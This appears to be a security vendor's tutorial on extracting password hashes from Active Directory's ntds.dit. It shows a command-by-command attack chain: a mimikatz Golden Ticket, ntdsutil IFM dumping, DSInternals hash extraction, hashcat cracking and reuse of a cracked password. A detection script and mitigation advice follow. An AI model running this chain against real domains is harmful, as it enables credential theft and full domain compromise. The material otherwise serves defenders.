NTDS.dit Password Extraction
All data in Active Directory is stored in the file ntds.dit (“the dit”) on every domain controller (in C:\Windows\NTDS\ by default). Attackers can use the password hashes directly from the dit to advance objectives. Cracking user passwords is beneficial even if an adversary has already obtained domain dominance, as users frequently re-use passwords across domain-joined and non-domain-joined systems and applications.
To gain access to the ntds.dit file on a domain controller, an adversary must have already gained administrator access to Active Directory. Alternatively, an adversary could compromise the enterprise backup solution responsible for backing up domain controllers and copy ntds.dit from a backup. Most organizations do not frequently rotate the krbtgt secret (see the Golden Ticket attack) so even older backups can be useful.
Attack Tutorial: How NTDS.dit Password Extraction Works
ntds.dit. As this requirement makes ntds.dit extraction a late-stage attack, an adversary could use a previously compromised password hash for a domain controller’s computer account to create a Silver Ticket. In the example below, the adversary uses mimikatz to gain access to a domain controller’s file system via a Golden Ticket.
PS> .\mimikatz.exe "kerberos::golden /user:FakeUser1 /domain:domain.com /sid:S-1-5-21-441320023-234525631-506766575 /id:S-1-5-21-441320023-234525631-506766575-1000 /target:DC1.domain.com /service:HOST /RC4:be3710380a7600e825a2d9ef4ae0fcf0 /ptt" "misc::cmd"
User : FakeUser1
Domain : domain.com (DOMAIN)
SID : S-1-5-21-441320023-234525631-506766575
User Id : 0
Groups Id : *513 512 520 518 519
ServiceKey: be3710380a7600e825a2d9ef4ae0fcf0 - rc4_hmac_nt
Service : HOST
Target : DC1.domain.com
Lifetime : 31/07/2020 11:13:28 ; 29/07/2030 11:13:28 ; 29/07/2030 11:13:28
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'FakeUser1 @ domain.com' successfully submitted for current session
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7FB1F4320
# A new command prompt window opens
C:\Windows\System32>
ntds.dit as well as the HKEY_LOCAL_MACHINE\SYSTEM registry hive, which is required to obtain the Boot Key for decrypting ntds.dit. Note that while Active Directory is running, it maintains a file system lock on the ntds.dit file, so attempts to copy it will fail. Adversaries have multiple ways to get around this constraint; in particular, they can:
- Simply stop Active Directory (though this is likely to result in being detected).
- Use the Volume Shadow Copy Service (VSS) to snapshot the volume and extract ntds.dit from the snapshot.
- Use a PowerShell tool like PowerSploit’s Invoke-NinjaCopy to copy the files even though they are in use.
- Use a built-in tool like DSDBUtil.exe or NTDSUtil.exe to create Active Directory installation media files.
PS> .\PSExec.exe \\dc1.domain.com cmd
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
DC1 > NTDSUTIL "Activate Instance NTDS" "IFM" "Create Full S:\Files" "q" "q"
NTDSUTIL: Activate Instance NTDS
Active instance set to "NTDS".
NTDSUTIL: IFM
ifm: Create Full S:\Files
Creating snapshot...
Snapshot set {3bacc31c-e2cb-4508-b0bf-5b4ec62f7c68} generated successfully.
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} mounted as C:\$SNAP_202007311120_VOLUMES$\
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} mounted as C:\$SNAP_202007311120_VOLUMEC$\
Initiating DEFRAGMENTATION mode...
Source Database: C:\$SNAP_202007311120_VOLUMES$\Windows\NTDS\ntds.dit
Target Database: S:\Files\Active Directory\ntds.dit
Defragmentation Status (Complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Copying registry files...
Copying S:\Files\registry\SYSTEM
Copying S:\Files\registry\SECURITY
Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} unmounted.
Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} unmounted.
IFM media created successfully in S:\Files
ifm: q
NTDSUTIL: q
DC1 > Copy S:\Files \\wks2\Share
ntds.dit and the HKLM\SYSTEM registry hive, they no longer require access to the organization’s network. An adversary interested in cracking the passwords will often want to run a brute-force attack with a computer optimized for that purpose, but first they’ll need to extract the hashes from ntds.dit. The DSInternals PowerShell module provides the Get-BootKey and Get-ADDBAccount cmdlets for this purpose.
$Key = Get-BootKey -SystemHiveFilePath C:\IFM\registry\SYSTEM
Get-ADDBAccount -BootKey $Key -DatabasePath 'C:\IFM\Active Directory\ntds.dit' -All |
Format-Custom -View HashcatNT |
Out-File C:\Hashdump.txt
PS> Get-Content C:\Hashdump.txt
f8ae01fc52f45dda7baf7a67721665f1
eed224b4784bb040aab50b8856fe9f02
# --- Output Truncated --- #
PS> .\hashcat.exe -m 1000 -a 3 --custom-charset1=?l?d?u --username -o cracked.txt .\Hashdump.txt ?1?1?1?1?1?1?1?1
Session..........: hashcat
Status...........: Running
Hash.Name........: NTLM
Hash.Target......: .\Hashdump.txt
Time.Started.....: Thu Aug 06 10:28:13 2020 (23 hours, 56 mins)
Time.Estimated...: Fri Aug 07 14:10:45 2020 (3 hours, 45 mins)
Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]
Guess.Charset....: -1 ?l?d?u, -2 Undefined, -3 Undefined, -4 Undefined
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2165.2 MH/s (9.16ms) @ Accel:16 Loops:256 Thr:1024 Vec:1
Recovered........: 1/41 (2.44%) Digests
Progress.........: 189030831226880/218340105584896 (86.58%)
Rejected.........: 0/189030831226880 (0.00%)
Restore.Point....: 793149440/916132832 (86.58%)
Restore.Sub.#1...: Salt:0 Amplifier:13312-13568 Iteration:0-256
Candidates.#1....: TNAZRwMl -> FYNkI2Jx
Hardware.Mon.#1..: Temp: 84c Fan: 82% Util: 97% Core:1265MHz Mem:2504MHz Bus:16
PS> Get-Content .\cracked.txt
852e811a65d732c83214b4ff705d777a:F8qN47F1
PS> # Attacker now uses the cracked passwords to authenticate with the username and password to a SaaS application's API
PS> $Username = "User1" # This is the user with the hash 852e811a65d732c83214b4ff705d777a which was cracked
PS> $Password = "F8qN47F1" # This is the password copied from cracked.txt
PS> $Object = New-Object -TypeName psobject
PS> $Object | Add-Member -MemberType NoteProperty -Name "login" -Value $Username
PS> $Object | Add-Member -MemberType NoteProperty -Name "password" -Value $Password
PS> $url = "https://service.url/api/login"
PS> $body = $Object | ConvertTo-Json
PS> $Header = @{ "accept" = "text/json"}
PS> $Response = Invoke-RestMethod -URI $url -Method POST -header $Header -Body $body -ContentType "application/json"
PS> $Headers = @{ 'Authorization' = "Bearer $Response" }
PS> $url = "https://service.url/api/DoThings"
PS> $Response = Invoke-RestMethod -Uri $url -Method Get -Headers $Headers
PS> $Response
{ "statusCode": 200, "statusMessage": "Things Done!" }
Detect, Mitigate and Respond
ntds.dit can be detected using the Windows event log. Event IDs 4663 and 4656 of the Audit File System subcategory can be used to audit file system access. Use these events to monitor for both regular and Volume Shadow Copy attempts to read or modify ntds.dit.
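The following is an added example of the detection logic this paragraph describes; it is not code from the original page. It runs over a constructed batch of normalized 4656/4663 records (field names mirror the EventData a SIEM flattens out of the Security log) and flags three situations: the live ntds.dit opened by something other than the directory service, ntds.dit opened through a VSS snapshot path (the C:\$SNAP_..._VOLUMEC$\ mount name from the ntdsutil output above, or the raw HarddiskVolumeShadowCopy device name), and an ntds.dit appearing outside C:\Windows\NTDS, as IFM media does. The lsass.exe baseline, the sample values and the exact path patterns are assumptions to adjust to your own environment.

```python
import re

# Constructed, normalized Security-log records (4656 = handle requested,
# 4663 = access attempted) with the EventData fields a SIEM flattens out.
# Sample values only, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 4663, "SubjectUserName": "SYSTEM", "ProcessName": r"C:\Windows\System32\lsass.exe",
     "ObjectName": r"C:\Windows\NTDS\ntds.dit", "AccessMask": "0x2"},
    {"EventID": 4656, "SubjectUserName": "FakeUser1", "ProcessName": r"C:\Windows\System32\cmd.exe",
     "ObjectName": r"C:\Windows\NTDS\ntds.dit", "AccessMask": "0x120089"},
    {"EventID": 4663, "SubjectUserName": "FakeUser1", "ProcessName": r"C:\Windows\System32\ntdsutil.exe",
     "ObjectName": r"C:\$SNAP_202007311120_VOLUMEC$\Windows\NTDS\ntds.dit", "AccessMask": "0x1"},
    {"EventID": 4663, "SubjectUserName": "FakeUser1", "ProcessName": r"C:\Windows\System32\ntdsutil.exe",
     "ObjectName": r"S:\Files\Active Directory\ntds.dit", "AccessMask": "0x2"},
    {"EventID": 4663, "SubjectUserName": "SYSTEM", "ProcessName": r"C:\Windows\System32\lsass.exe",
     "ObjectName": r"C:\Windows\NTDS\edb.log", "AccessMask": "0x2"},
    {"EventID": 4663, "SubjectUserName": "alice", "ProcessName": r"C:\Windows\explorer.exe",
     "ObjectName": r"C:\Users\alice\notes.txt", "AccessMask": "0x2"},
]

NTDS_FILE = re.compile(r"\\ntds\.dit$", re.IGNORECASE)
# Snapshot paths: the mount name ntdsutil/IFM uses (C:\$SNAP_..._VOLUMEC$\ above)
# or the raw VSS device name. Assumed patterns; extend for your tooling.
SHADOW_PATH = re.compile(r"\\\$SNAP_[^\\]*\$\\|HarddiskVolumeShadowCopy", re.IGNORECASE)
LIVE_DIT = r"c:\windows\ntds\ntds.dit"
# Assumption: on a DC the NTDS service runs inside lsass.exe and keeps the live
# file open; any other process opening it is worth a look.
EXPECTED_PROCESSES = {r"c:\windows\system32\lsass.exe"}
# File access-right bits: WriteData (0x2), AppendData (0x4), DELETE (0x10000).
WRITE_BITS = 0x2 | 0x4 | 0x10000


def classify(event):
    """Return an alert dict for an ntds.dit-related 4656/4663 event, else None."""
    if event.get("EventID") not in (4656, 4663):
        return None
    obj = event.get("ObjectName", "")
    if not NTDS_FILE.search(obj):
        return None
    proc = event.get("ProcessName", "").lower()
    mask = int(event.get("AccessMask", "0x0"), 16)
    intent = "write" if mask & WRITE_BITS else "read"

    if SHADOW_PATH.search(obj):
        reason = "ntds.dit opened inside a Volume Shadow Copy snapshot"
    elif obj.lower() == LIVE_DIT:
        if proc in EXPECTED_PROCESSES:
            return None  # baseline: the directory service's own I/O
        reason = "live ntds.dit opened by a process other than the NTDS service"
    else:
        reason = "ntds.dit present outside the NTDS directory (copy or IFM media)"

    return {
        "event_id": event["EventID"],
        "user": event.get("SubjectUserName", "?"),
        "process": event.get("ProcessName", "?"),
        "object": obj,
        "intent": intent,
        "reason": reason,
    }


def scan(events):
    """Run classify() over a batch of events and keep only the alerts."""
    return [alert for alert in map(classify, events) if alert is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['event_id']}] {alert['user']} via {alert['process']}: "
              f"{alert['reason']} ({alert['intent']}) -> {alert['object']}")
```

Against the sample batch the scan returns three alerts (the cmd.exe handle on the live file, the snapshot read, and the IFM copy written to S:\Files) and stays silent for the directory service's own I/O and for unrelated files. The 4663/4656 events only exist if an Audit File System SACL is actually set on ntds.dit, so confirm the audit rule is in place before relying on this logic.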
ntds.dit, use the following best practices to help ensure that adversaries do not obtain the privileges necessary to compromise domain controllers in the first place:
- Routinely audit administrative access to Active Directory, including Group Policy rights and audit configuration for logons to domain controllers.
- Rigorously follow the clean source principle for domain controllers: All infrastructure (e.g., ESX and attached storage) on which domain controllers reside or applications that service domain controllers (such as backup solutions) run must do so at the same security level as domain controllers themselves.
- Ensure the physical security of the domain controller machines. If physical security cannot be assured, consider running read-only domain controllers to limit the exposure of passwords.
- Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from a workstation to a server or domain controller.
ntds.dit is expected, a full compromise of Active Directory must also be assumed; in particular, assume the krbtgt secret was also compromised. Take the following action:
- Activate the incident response process and alert the response team. Recovery from a full compromise of Active Directory requires significant planning and effort.
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.